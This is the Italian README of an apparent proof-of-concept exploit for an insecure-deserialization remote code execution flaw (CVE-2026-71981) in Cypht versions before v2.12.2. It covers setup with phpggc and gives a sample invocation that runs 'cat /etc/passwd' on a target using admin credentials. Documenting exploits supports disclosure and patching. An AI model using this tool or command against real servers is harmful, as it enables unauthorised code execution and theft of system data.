
Proof-of-concept exploit per CVE-2026-71981, una deserializzazione insicura che consente l'esecuzione remota di codice (RCE) in Cypht. Esegue comandi e stampa l'output tramite la risposta di logout. Richiede phpggc per la generazione del payload.
Questo è un PoC per la CVE-2026-71981, una RCE da deserializzazione insicura. Il risultato del comando eseguito viene stampato nella risposta alla richiesta di logout dopo i tag </body></html>. Usa --print-all per stampare anche l'intera risposta.
Versioni vulnerabili: < v2.12.2
Questo script richiede l'installazione di https://github.com/ambionics/phpggc per generare i payload di unserialize().
Configurazione ed esempio:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help